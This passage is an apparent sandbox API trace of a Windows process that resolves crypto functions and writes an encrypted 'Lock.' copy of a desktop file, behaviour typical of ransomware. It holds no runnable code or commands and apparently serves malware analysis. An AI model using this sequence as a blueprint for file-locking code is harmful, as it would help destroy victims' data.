dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0132.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0132.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0132.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0132.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0132.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69c28 [0132.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69c28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0132.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0132.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0132.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0132.208] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0132.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0132.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0132.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0132.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0132.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0132.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0132.208] CryptDestroyHash (hHash=0xa87110) returned 1 [0132.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0132.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0132.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0132.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0132.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0132.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0132.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0132.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0132.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0132.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0132.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0132.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0132.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0132.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0132.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0132.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0132.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0132.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0132.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0132.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0132.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0132.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0132.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0132.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0132.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0132.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0132.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0132.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0132.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0132.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0132.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0132.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0132.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0132.211] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0132.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0132.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0132.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0132.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0132.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0132.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0132.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0132.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0132.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0132.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0132.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0132.213] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0132.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0132.214] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.214] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.214] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0132.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0132.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0132.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0132.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0132.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0132.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0132.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0132.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f26008 [0132.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0132.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0132.215] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/3cV5UrNf8.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\3cv5urnf8.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0132.215] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.215] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0132.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0132.216] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0132.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0132.216] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.216] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0132.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0132.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0132.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0132.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0132.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0132.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0132.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0132.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0132.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0132.216] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0132.217] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.3cV5UrNf8.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.3cv5urnf8.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0132.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0132.218] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0132.218] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.218] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0132.218] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0132.342] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0132.342] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f26008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f26008*, lpNumberOfBytesRead=0x8cf4f8*=0x1309, lpOverlapped=0x0) returned 1 [0132.345] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f26008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f26008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0132.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0132.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0132.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0132.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bea020 | out: hHeap=0x970000) returned 1 [0132.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0132.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0132.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0132.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0132.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0132.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0132.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0132.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f46018 | out: hHeap=0x970000) returned 1 [0132.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0132.349] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0132.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f46018 | out: hHeap=0x970000) returned 1 [0132.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0132.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0132.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0132.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0132.350] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0132.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0132.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0132.350] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0132.350] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0132.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0132.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0132.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0132.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0132.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0132.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0132.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0132.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0132.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0132.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0132.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0132.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0132.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0132.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0132.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0132.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0132.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0132.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0132.351] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0132.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0132.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0132.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0132.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0132.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0132.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0132.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0132.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0132.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0132.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0132.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0132.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0132.352] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0132.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0132.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0132.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0132.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 